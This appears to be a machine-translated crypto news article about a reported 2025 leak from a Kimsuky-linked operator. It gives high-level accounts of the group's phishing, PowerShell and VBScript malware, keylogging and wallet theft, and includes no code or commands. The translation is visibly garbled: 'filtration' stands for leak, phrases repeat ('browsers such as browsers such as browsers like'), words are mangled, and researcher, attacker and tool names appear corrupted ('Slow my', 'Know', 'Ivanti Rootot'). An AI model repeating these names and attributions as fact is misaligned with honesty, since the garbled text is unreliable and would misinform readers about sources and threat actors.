Mass filtration reveals spying arsenal and crypto theft of the Hacker Kimsuky group

A member of the North Korean hacker group Kimsuky It would have suffered a massive data filtration, exposing tools and techniques used in cyberspage and cryptocurrency theft operations.

***

• Filtration includes hundreds of GB of internal files, malware and campaign records.
• The data is attributed to an operator known as “Kim”, linked to Kimsuky.
• Researchers do not rule out links with Chinese actors.

An alleged member of the North Korean hacker group Kimsuky, Classified as an advanced persistent threat (APT), it would have been the victim of a massive data filtration that exposes tools, internal files and records of its operations. According to security researchers from Slow my, The leak amounts to hundreds of gigabytes and contains from navigation records to malware manuals, including tools for cryptocurrency.

According to Cryptopolitanfiltered information includes pHishing campaign records, custom backdoors manuals, as well as malicious programs such as “Tomcat Kernel Backdoor “modified variants of Cobalt Strike, Ivanti Rootot and malware for Android as TOYBOX These findings offer an unprecedented vision of the offensive capabilities of the group.

Filtration origin

The incident, which would have occurred at the beginning of June 2025, was tracked up to two committed systems linked to an operator who used alias “Kim.” One of them was a workstation Linux with Deepin 20.9, apparently used to develop malware. The other was a server VPS Public who housed Spear-Phishing material, such as false login portals and command and control links.

The responsible attackers, which are identified as “Know” and “Cyb0rg”, They claim to have accessed both systems, extracted their content and published online information. Although some indications relate to “Kim” with the known infrastructure of Kimsuky, Certain technical and linguistic elements point to a possible link with China, so the definitive origin is still unconfirmed.

Group history and tactics Kimsuky

Active since at least 2012, Kimsuky has been associated with the General Office of North Korea recognition. His campaigns have signed up for governments, research centers, defense contractors and universities, with the aim of collecting intelligence.

In 2025, the group has executed operations such as Deep#Drive, that used intrusion chains in several stages. These began with files Zip tablets containing direct accesses of Windows (LNK) Document disguised. When opening them, commands were executed Powershell that downloaded malware from services such as Dropbox, using lure documents to avoid detection.

In March and April 2025, Kimsuky He incorporated code VBScript and Powershell Officered in malicious Zip files. These scripts assembled commands covertly, deploying malware capable of registering pulsed keys, capturing the clipboard and stealing cryptocurrency purses stored in browsers such as browsers such as browsers like Chrome, Edge, Firefox and Naver Whale.

Evolution of tools

The group has adopted new techniques for undercover remote access, as personalized modules of RDP Wrapper and Malware Proxy. Has also used tools such as Forcecopy to extract credentials from browsers without activating safety alerts.

Another frequent tactic has been the abuse of legitimate platforms. In June 2025, a Spear-Phishing campaign against South Korea used private repositories of GITHUB to store malware and stolen data, while Dropbox It served as a temporary repository. This allowed them to camouflage their malicious activity within the legitimate traffic of the network.

The case of filtration against “Kim” represents an unusual blow against Kimsuky, that usually operates in the shadows. The exposure of their tools and methods could affect their operational capacity in the short term, although experts warn that the group will probably try to adapt and continue their cyberspage activities.

Written article with the help of an AI content editor, edited by Angel Di Matteo / Diariobitcoin

Original image of UNSPLASH.

WARNING: Diariobitcoin offers informative and educational content on various topics, including cryptocurrencies, AI, technology and regulations. We do not provide financial advice. Cryptactive investments are high risk and may not be adequate for all. Investigate, consult an expert and verify the applicable legislation before investing. I could lose all its capital.

Subscribe to our newsletter